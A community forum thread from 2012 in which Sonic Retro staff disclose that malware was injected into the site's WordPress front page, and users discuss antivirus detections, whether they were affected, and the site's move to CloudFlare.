Sonic and Sega Retro Message Board: UPDATE: Malware distributed through Front Page - Sonic and Sega Retro Message Board

Jump to content

Hey there, Guest!  (Log In · Register) Help
  • 4 Pages +
  • 1
  • 2
  • 3
  • Last ►
    Locked
    Locked Forum

UPDATE: Malware distributed through Front Page

#1 User is offline SeanieB 

Posted 21 July 2012 - 09:08 PM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12
Quick note to those who do not check the front page:

Malware was detected embedded in the Wordpress' code, and could have been there as far back as June 23rd.

I found a file full of potentially infected hosts, hosted here: https://blessedra.in.../docs/hits.html

As far as I know it only infects Internet Explorer and Firefox users with out of date Java installed. If your IP is on that list, I urge you to check your machine.

#2 User is offline Chibisteven 

Posted 21 July 2012 - 10:55 PM

  • Posts: 1176
  • Joined: 20-August 08
  • Gender:Male
  • Location:US
  • Wiki edits:11
Yes, I found it odd that Avast said malware on the network bound traffic scanner. Atleast I know I wasn't crazy.

Edit: My IP is on the list, yes. But nothing is my machine... My Anti-Virus has been very good at stopping infections before getting on my machine and do damage. It can detect while .zip files download and attemp to remove during the download before it even gets on my hard drive. It's why I Sonic 2HD demo download kept getting corrupted and unreadable.

But I'm double-checking again to be sure.

2nd Edit: I like to add that I'm checking right now and will post anything suspicious that I found. I keep all parts of Winodows fully update to date. Hi-Jack This, I see nothing odd there. Anti-Virus and Anti-Spyware check in progress.

3rd edit: Nothing found.
This post has been edited by Chibisteven: 22 July 2012 - 01:37 AM

#3 User is offline SoullessSentinel 

Posted 22 July 2012 - 06:28 AM

  • Posts: 246
  • Joined: 01-October 05
  • Gender:Male
  • Location:Grimsby, England
  • Project:Sonic 1 32X Remix
My IP is also on this list, my usual antivirus found nothing, but I am currently doing a scan with malwarebytes. Thanks for the heads up.

Is there any information available on the nature of this malware?

#4 User is offline Chibisteven 

Posted 22 July 2012 - 08:30 AM

  • Posts: 1176
  • Joined: 20-August 08
  • Gender:Male
  • Location:US
  • Wiki edits:11
Kind of curious how it got there in the first place on the front page.
This post has been edited by Chibisteven: 22 July 2012 - 08:36 AM

#5 User is offline Vinchenz 

Posted 22 July 2012 - 11:11 AM

  • Yo! Hustle! Hustle!
  • Posts: 1393
  • Joined: 10-January 10
  • Gender:Male
  • Location:Canada
  • Project:Unity 5evr
I was wondering why my computer picked up a virus. I've haven't got one since before college...

Regardless, Avast! cleaned it up for me so its not a fatal kind of virus at least.

#6 User is offline Shadow Fire 

Posted 22 July 2012 - 11:18 AM

  • Ultimate victory!
  • Posts: 1557
  • Joined: 05-February 05
  • Gender:Male
  • Location:The Land of Darkness
  • Project:Sonic: The Lost Land (Series), The GCN (site)
  • Wiki edits:60
I was wondering why NOD32 was picking up virii at this site. Glad I invested in it.

#7 User is offline GeneHF 

Posted 22 July 2012 - 02:40 PM

  • SEGA-ier than you'll potentially ever be.
  • Posts: 8373
  • Joined: 16-May 04
  • Gender:Male
  • Location:Scenic Studiopolis
  • Project:Complete Global Conquest
  • Wiki edits:381
IP was on list, no hits from avast and Bytes.

(shruuuuug)

#8 User is offline Kharen 

Posted 22 July 2012 - 02:53 PM

  • Posts: 493
  • Joined: 29-October 11
  • Gender:Male
  • Location:Eastern Washington University
I have Internet Explorer, but I only ever use Chrome. Is that a problem?

#9 User is offline SeanieB 

Posted 22 July 2012 - 02:55 PM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12

View PostKharen, on 22 July 2012 - 02:53 PM, said:

I have Internet Explorer, but I only ever use Chrome. Is that a problem?


Nope, you'd have known if something would have happened, you'dve gotten a broken page and Java would have popped up, and you'd have to actually been using IE at the time.

#10 User is offline SeanieB 

Posted 23 July 2012 - 02:51 AM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12
While I have the ability to, I thought I'd give you all an update.

I've dis-infected the home page, and we've switched Retro over to a CloudFlare setup.

CloudFlare is basically this really fancy service that a lot of people are using these days, which claims to protect and speed up websites by bringing advantages of "the cloud" to conventional sites. Because the system they use is so simple, it's also quite a bit less susceptible to security problems than the webserver we use.

They also actively monitor incoming connections for people doing things they shouldn't do, and challenges their ability to connect to the site.

Being in the cloud, it geographically distributes cached content from the site, so people far away from Retro's actual server may notice an increase in speed, and it reduces Retro's bandwidth usage as well.

It's not perfect though. You may notice occasional cloudflare error pages, or sometimes Cloudflare goes down when the site does not. I made a whole report and everyone else weighed the options and decided to just use Cloudflare, that the potential hiccups every so often were worth the no-effort security layer.

Some people may still not be able to reach Retro yet because we had to overhaul the DNS setup to use Cloudflare. Everyone should hopefully be caught up within a matter of hours after this post. If you know someone who's STILL stuck over 4 hours past the timestamp on this post, let me know.

#11 User is offline SpeedStarTMQ 

Posted 23 July 2012 - 03:23 AM

  • Posts: 2259
  • Joined: 20-April 10
  • Gender:Male
  • Location:London, England
  • Project:Playing Wii U - ADD ME.
  • Wiki edits:5
Any idea on the nature of the Malware?

#12 User is offline SeanieB 

Posted 23 July 2012 - 03:29 AM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12
I went over it in the original post, all it was was a Wordpress "0-day" exploit that tried to exploit outdated versions of Java and Adobe Reader in vulnerable Firefox and IE versions, and dropped a list of IPs it tried to infect on the server to come back and get later.

#13 User is offline Caniad Bach 

Posted 23 July 2012 - 09:52 AM

  • is a peanut
  • Posts: 1822
  • Joined: 18-March 10
  • Gender:Not Telling
  • Location:Cardiff
AVG just blocked an "Exploit Blackhole Exploit Kit (type 2170)" from me just opening up the RSS feed o.0

#14 User is offline PicklePower 

Posted 23 July 2012 - 08:01 PM

  • Posts: 575
  • Joined: 15-April 04
  • Gender:Male
  • Wiki edits:2,809
Would someone be able to explain how it was possible to list which IP addresses were affected, and why that list was hosted outside of Retro?

#15 User is offline SeanieB 

Posted 23 July 2012 - 08:02 PM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12
Read my post, and I hosted it outside of Retro because retro was down when the story broke.

  • 4 Pages +
  • 1
  • 2
  • 3
  • Last ►
    Locked
    Locked Forum

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users